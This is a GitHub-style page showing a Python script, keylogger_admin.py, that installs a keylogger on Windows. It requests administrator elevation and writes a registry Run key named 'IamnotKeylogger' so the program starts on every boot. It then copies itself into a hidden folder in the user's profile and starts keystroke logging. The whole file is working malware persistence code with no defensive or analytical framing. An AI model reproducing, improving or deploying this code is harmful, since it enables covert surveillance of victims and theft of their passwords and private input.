-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkeylogger_admin.py
50 lines (43 loc) · 1.66 KB
/
keylogger_admin.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import os, sys, subprocess, ctypes
import keylogger
from getpass import getuser
from shutil import copy
# Run command line
def exec_cmd (cmde):
if cmde:
execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
cmdout = execproc.stdout.read() + execproc.stderr.read()
return cmdout
# Check if a user has admin rights
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
# Copy exec file to this folder
def run_by_admin(exec_path):
if not os.path.exists(exec_path):
if not is_admin():
# Re-run the program with requiring admin rights
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
sys.exit()
# Craft the command line
filename = os.path.basename(sys.executable)
reg_name = 'IamnotKeylogger'
reg_path = r'\"%s\%s\" /background' %(exec_path, filename)
#REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "IamnotKeylogger" /t REG_SZ /d "\"C:\Users\minh\IamnotKeylogger\keylogger.exe\" /background" /F
cmde = r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "%s" /t REG_SZ /d "%s" /F' %(reg_name, reg_path)
exec_cmd(cmde)
# Copy to hidden folder
os.makedirs(exec_path)
os.system('attrib +h ' + exec_path)
copy(sys.executable, exec_path)
# Main handle
def execute():
user_name = getuser()
exec_path = r'C:\Users\%s\IamnotKeylogger' %(user_name)
run_by_admin(exec_path)
keylogger.run(exec_path)
# Test
if __name__ == '__main__':
execute()